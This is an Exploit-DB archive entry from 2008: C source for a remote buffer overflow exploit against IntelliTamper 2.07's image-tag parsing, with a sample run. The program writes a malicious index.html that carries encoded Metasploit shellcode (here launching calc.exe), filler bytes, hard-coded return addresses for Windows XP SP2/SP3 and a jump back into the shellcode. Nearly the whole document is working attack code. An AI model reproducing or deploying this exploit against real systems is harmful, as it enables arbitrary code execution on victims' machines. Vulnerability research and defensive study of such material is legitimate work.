IntelliTamper 2.07 - 'imgsrc' Remote Buffer Overflow

EDB-ID:

6195

Author:

r0ut3r

Type:

remote

Platform:

Windows

Published:

2008-08-03

/*
* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Expoit
*
* Discovered & Written by r0ut3r (writ3r [at] gmail.com)
* Many Thanks to Luigi Auriemma (http://aluigi.org)
*
* Greets to shinnai (http://www.shinnai.net)
* and Guido Landi
*
* IntelliTamper contains a remote buffer overflow vulnerability.
* The HTML parser, more precise the image tag fails to preform
* boundary checks on supplied data.
*
* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c
* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0
* [!] OS: Microsoft Windows XP Pro SP 2
* [+] Building payload
* [+] Inserting JMP code
* [+] Success writing to index.html
* kit:/home/r0ut3r/public_html/imgsrc-xpl #
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* win32_exec -  EXITFUNC=thread CMD=c:\windows\system32\calc.exe Size=184
Encoder=PexFnstenvSub http://metasploit.com
Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */
unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xd8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x99"
"\xeb\x8d\x6a\x83\xeb\xfc\xe2\xf4\x65\x03\xc9\x6a\x99\xeb\x06\x2f"
"\xa5\x60\xf1\x6f\xe1\xea\x62\xe1\xd6\xf3\x06\x35\xb9\xea\x66\x23"
"\x12\xdf\x06\x6b\x77\xda\x4d\xf3\x35\x6f\x4d\x1e\x9e\x2a\x47\x67"
"\x98\x29\x66\x9e\xa2\xbf\xa9\x6e\xec\x0e\x06\x35\xbd\xea\x66\x0c"
"\x12\xe7\xc6\xe1\xc6\xf7\x8c\x81\x12\xf7\x06\x6b\x72\x62\xd1\x4e"
"\x9d\x28\xbc\xaa\xfd\x60\xcd\x5a\x1c\x2b\xf5\x66\x12\xab\x81\xe1"
"\xe9\xf7\x20\xe1\xf1\xe3\x66\x63\x12\x6b\x3d\x6a\x99\xeb\x06\x02"
"\xa5\xb4\xbc\x9c\xf9\xbd\x04\x92\x1a\x2b\xf6\x3a\xf1\x04\x43\x8a"
"\xf9\x83\x15\x94\x13\xe5\xda\x95\x7e\x88\xb7\x36\xee\x82\xe3\x0e"
"\xf6\x9c\xfe\x36\xea\x92\xfe\x1e\xfc\x86\xbe\x58\xc5\x88\xec\x06"
"\xfa\xc5\xe8\x12\xfc\xeb\x8d\x6a";

#define JMP 0xe9 //JMP

int main(int argc, char* argv[])
{
    FILE *fd;
    unsigned char buff[4000],
                *jmpref,
                *p;
    int opt;

    struct
    {
        char *os;
        unsigned int eip;
    } targets[] =
        {
            "Microsoft Windows XP Pro SP 2",
            0x7d040e1f,

            "Microsoft Windows XP Pro SP 3",
            0x7c8369f0
        };

    if (argc < 2)
    {
        printf("---------------------------------------------------------\n");
        printf("     IntelliTamper 2.07 Remote Buffer Overflow Expoit    \n\n");

        printf("  Discovered & Written by r0ut3r (writ3r [at] gmail.com)\n");
        printf("       Thanks to Luigi Auriemma (http://aluigi.org)\n\n");

        printf("  Usage: %s <OS-type>\n", argv[0]);
        printf("      0: Microsoft Windows XP Pro SP2\n");
        printf("      1: Microsoft Windows XP Pro SP3\n");
        printf("---------------------------------------------------------\n");
        return 1;
    }

    p = buff;

    switch (atoi(argv[1]))
    {
        case 0:
            opt = 0;
            printf("[!] OS: %s\n", targets[0].os);
        break;

        case 1:
            opt = 1;
            printf("[!] OS: %s\n", targets[1].os);
        break;
    }

    printf("[+] Building payload\n");
    p += sprintf(p, "<img src=\"http://");

    jmpref = p;

    p += sprintf(p, "%s", shellcode);

    int i;
    int a = 3065 - (p - jmpref);
    for (i=0; i < a; i++)
        *p++ = 'A';

    *(unsigned int *) p = targets[opt].eip;
    p += 4;

    printf("[+] Inserting JMP code\n");

    *p++ = JMP;
    *(unsigned int *) p = jmpref - (p + 4); //JMP -(3065+4+5)
    p += 4;

    p += sprintf(p, "\">");

    fd = fopen("index.html", "wb");
    if (fd == NULL)
    {
        perror("[-] Failed opening index.html\n");
        return 1;
    }

    fwrite(buff, 1, p - buff, fd);
    if (fclose(fd) == 0)
        printf("[+] Success writing to index.html\n");
    else
        printf("[-] Failed writing to index.html\n");

    return 0;
}

// milw0rm.com [2008-08-03]